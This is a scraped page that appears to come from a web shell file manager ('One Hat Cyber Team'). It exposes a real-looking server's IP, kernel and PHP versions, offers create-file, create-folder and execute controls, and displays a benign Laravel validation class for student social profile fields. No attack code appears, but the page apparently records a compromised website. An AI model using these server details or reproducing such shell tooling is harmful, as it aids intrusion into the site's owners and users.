⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.177
Server IP:
50.6.168.112
Server:
Linux server-617809.webnetzimbabwe.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
Server Software:
Apache
PHP Version:
8.4.10
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
ctaacademy
/
www
/
app
/
Http
/
Requests
/
Frontend
/
View File Name :
StudentProfileSocialUpdateRequest.php
|string> */ public function rules(): array { return [ 'facebook' => ['nullable', 'string', 'max:255'], 'twitter' => ['nullable', 'string', 'max:255'], 'linkedin' => ['nullable', 'string', 'max:255'], 'website' => ['nullable', 'string', 'max:255'], 'github' => ['nullable', 'string', 'max:255'], ]; } function messages(): array { return [ 'facebook.string' => __('The facebook must be a string.'), 'facebook.max' => __('The facebook may not be greater than 255 characters.'), 'twitter.string' => __('The twitter must be a string.'), 'twitter.max' => __('The twitter may not be greater than 255 characters.'), 'linkedin.string' => __('The linkedin must be a string.'), 'linkedin.max' => __('The linkedin may not be greater than 255 characters.'), 'website.string' => __('The website must be a string.'), 'website.max' => __('The website may not be greater than 255 characters.'), 'github.string' => __('The github must be a string.'), 'github.max' => __('The github may not be greater than 255 characters.'), ]; } }